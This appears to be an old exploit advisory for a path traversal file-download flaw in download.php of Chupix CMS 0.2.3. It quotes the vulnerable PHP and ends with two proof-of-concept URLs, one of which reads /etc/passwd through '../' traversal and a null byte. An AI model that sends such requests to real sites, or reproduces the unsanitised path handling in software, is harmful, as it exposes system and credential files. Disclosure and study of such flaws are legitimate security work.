# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability # P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930 ################################download.php################################ Lain:18->57 -> ******************************************************************************************************************** if(isset($_GET['fichier'])){ <--------------XXXX * // téléchargement du fichier * $file = "archives/". $_GET['repertoire'] ."/". $_GET['fichier'];<--------------XXXX * $fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] .".php" * $repertoire = "archives/". $_GET['repertoire'] ."/cpt/"; * if(is_file($fichier_txt)){ * $fp = @fopen($fichier_txt, "r"); <--------------XXXX * $result = fread($fp, filesize ($fichier_txt)); * fclose($fp); * $result = str_replace("", "", $result); * * $num = trim($result); * }else{ * $num = 0; * } * $num++; * * $msg = ""; * * if(!(is_dir($repertoire))){ * mkdir ($repertoire, 0755); * } * * $fp = @fopen($fichier_txt, "w+");<--------------XXXX * if (flock($fp, LOCK_EX)) { // pose un verrou exclusif * fwrite($fp, $msg); * flock($fp, LOCK_UN); // libère le verrou * }else{ * echo "Impossible de verrouiller le fichier ". $fichier .""; * } * fclose($fp); * * * * * header("Content-type: application/force-download"); * header("Content-Disposition: attachment; filename=".$_GET['fichier']); * readfile($file);<--------------XXXX * } * ******************************************************************************************************************** # POC: /download.php?repertoire=defaut&fichier=../../download.php /download.php?fichier=../../../../../../../etc/passwd%00 # Discovered by: GoLd_M # SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com